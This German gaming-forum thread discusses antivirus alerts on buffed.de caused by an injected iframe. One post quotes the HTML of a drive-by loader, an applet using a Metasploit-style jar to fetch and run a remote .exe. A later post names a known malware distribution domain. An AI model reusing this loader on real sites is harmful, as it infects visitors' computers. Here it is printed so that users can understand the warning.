Viren Meldung von Buffed.de

Nehmen wir an es ist ein Trojaner, okay was ist jetz? haben alle bisauf die die Avast haben nun nen Trojaner?
gut das ich mich für das einzig richtige Antivir entschieden hab
 
Zuletzt bearbeitet von einem Moderator:
Narf.

und es ist nix durchkommen^^
Zum Vergrößern anklicken....

^^ klar, das weißt Du ... sicher bist Du aber leider nicht. Und "das einzig richtige" ist was andres... soviel zu Pauschalisierungen

Kleine Erklärung
Leute, das ist eine ASP Webseite, die in einem winzigen IFrame aufgerufen wird... diese Seite verweist auf eine HTML Seite, wo eine Exe zum Download angeboten wird.

Der Sourcecode dazu:
1 <html>
2 <head></head>
3 <body>
4 <applet archive="ccc.jar" code="msf.x.HelloWorld.class" width="1" heigh t="1">
5 <param name="data" value="http://ENTFERNT/QC032312.exe"/>
6 <param name="lhost" value="127.0.0.1"/>
7 <param name="lport" value="443"/>
8 </applet>
9 </body>
10 </html>

Wird diese ausführbare Datei gestartet, passieren vermutlich keine guten Dinge
smile.gif
kann also sehr wohl ein Trojaner o.ä. sein.
Sucht doch mal auf der Platte nach der Datei bzw. in eurem Ordner für temporäre Internetdateien (Cache).

Technikexperten von Buffed können euch dann sicherlich mehr sagen.
 
Zuletzt bearbeitet von einem Moderator:
Gleiches Spiel wie in meinem vorherigem Beitrag http://www.buffed.de...d-auf-buffedde/

Nur diesesmal ist es ein Popup, das ich vorher auf dieser Site noch nicht gesehen habe. ( Es ist nicht der Layer ) Meldung von Nod32 bleibt die gleiche.

Euros4Click scheint da etwas anfällig zu sein
wink.gif
 
Zuletzt bearbeitet von einem Moderator:
Hmm habt ihr ihn behoben? bei mir kommen keine blockierungen mehr, oder er hat mein avast durchbrochen
 
Skyler93 schrieb:
Hmm habt ihr ihn behoben? bei mir kommen keine blockierungen mehr, oder er hat mein avast durchbrochen
Zum Vergrößern anklicken....

Da ist nichts durchbrochen, wie auch. Das Script ist auch kein Trojaner sondern nur ein Fehlalarm von Avast.

Der Thread hier betrifft fast dasselbe:http://www.buffed.de/forum/index.php/topic/122218-virus-auf-buffed/
 
und wieso meint irgendeiner er hatn trojaner? hää
 
Skyler93 schrieb:
und wieso meint irgendeiner er hatn trojaner? hää
Zum Vergrößern anklicken....

Weil er den Trojaner vll zufällig woanders her hat?
Unter den Buffed-Usern finden sich sicher noch mehr Leute die Trojaner auf dem Rechner haben.

Wenn nur ein einziges Programm einen Virus erkennt und dieser dann auch noch "Heur" im Namen hat; dann kann man fast immer von einem Fehlalarm ausgehen.
 
Die Meldung wurde leider durch einen alten, für Änderungen anfälligen Codebereich ausgelöst, den wir vor einiger Zeit schon entfernt haben. Aber es war wohl noch irgendwo eingebunden - die Meldung dürfte maximal im mybuffed-Bereich aufgetaucht sein. Das System dahinter ist jetzt komplett gelöscht. Die Einbindung des Iframes ist also nicht mehr möglich!

Neben dem Virenscanner sollte die Sicherheitseinstellungen des Browser schon ausreichen, um Java-Ausführungen bzw. ungewünschte Downloads von Inhalten aus IFRAMES heraus zu unterbinden bzw. zu blockieren.

Petu schrieb:
Gleiches Spiel wie in meinem vorherigem Beitrag http://www.buffed.de...d-auf-buffedde/
Nur diesesmal ist es ein Popup, das ich vorher auf dieser Site noch nicht gesehen habe. ( Es ist nicht der Layer ) Meldung von Nod32 bleibt die gleiche.
Euros4Click scheint da etwas anfällig zu sein
wink.gif
Zum Vergrößern anklicken....

Ist das wieder aufgetaucht oder beziehst du dich noch auf die alte Meldung?
 
Zuletzt bearbeitet von einem Moderator:
Ich beziehe mich auf diese Meldung hier.

Wobei es aber der gleiche "googlelitys jss" (oder wie auch immer der Name war). Also das von der "China" Site, wie es in meinem oben verlinkten Beitrag schon der Fall war.

Wie gesagt: Es tauchte aber diesesmal ein "Richtiges" Popup auf, also nicht nur der Layer. Fand ich schon erstaunlich, weil Firefox eigentlich schon recht zuverlässig Popups blockt.
 
Zuletzt bearbeitet von einem Moderator:
übrigens grade ist er wieder gekommen und kommt wieder und wieder -.- nervt
 
Die erste scheint verschwunden zu sein, aber jetzt kommt ne andere direkt auf der Hauptseite (www.buffed.de):

avast!Warnung

Datei-Name: http://www.buffed.de...admin/latest.js
Malware-Name: HTML:Iframe-inf
Malware-Typ: Virus/Wurm
VPS-Version: 100319-0, 19.03.2010
 
Zuletzt bearbeitet von einem Moderator:
Also bei mir kommt immernoch die selbe Meldung, aber auch wieder HTML:Iframe-inf (Engine-B)

Seit wann ist denn bitte GDATA und Avast ein Programm?
 
Blut schrieb:
Also bei mir kommt immernoch die selbe Meldung, aber auch wieder HTML:Iframe-inf (Engine-B)

Seit wann ist denn bitte GDATA und Avast ein Programm?
Zum Vergrößern anklicken....

GDATA und Avast sind schon zwei verschiedene Programme; aber GDATA benutzt das Engine von Avast(und das von Bitdefender). Also alles was Avast erkennt, wird auch von GDATA erkennt; und natürlich auch andersrum.

Hier ist schonmal die erste Antwort von Avast:
Hello,

This is not a false positive. The file in the url you have sent is currently offline, but I have found it from the fp submits -> infection is located at the end of the file, there is an iframe that points to googleticys.com which is known malware distribution server.

Best Regards
Zum Vergrößern anklicken....
 
Ich sags ja - manchmal ist es besser das Rad neu zu erfinden, statt Thirdparty-Software zu nutzen. Der Site-Messenger war angreifbar - die Restleiden sind entfernt.
 
War das nun gefährlich? Und was kann man machen, falls man es auf dem Pc hat?
 
Einloggen o. Registrieren zum Antworten.

Similar threads

D
Blue Dragon sucht Mitglieder
Antworten
4
Aufrufe
1K
Dratonia
D
K
Kommentare werden nicht veröffentlicht
Antworten
18
Aufrufe
3K
Keltus
K
ElleDelle
Auf der Suche nach der perfekten Lehrstelle - eure Erfahrungen?
Antworten
8
Aufrufe
1K
ElleDelle
ElleDelle
D
Allianz Blue Dragon auf Rexxar/Alleria sucht
Antworten
5
Aufrufe
2K
Dratonia
D
E
Die Minotauren suchen [PC]
Antworten
1
Aufrufe
1K
Evenyah
E
Oben Unten
Zurück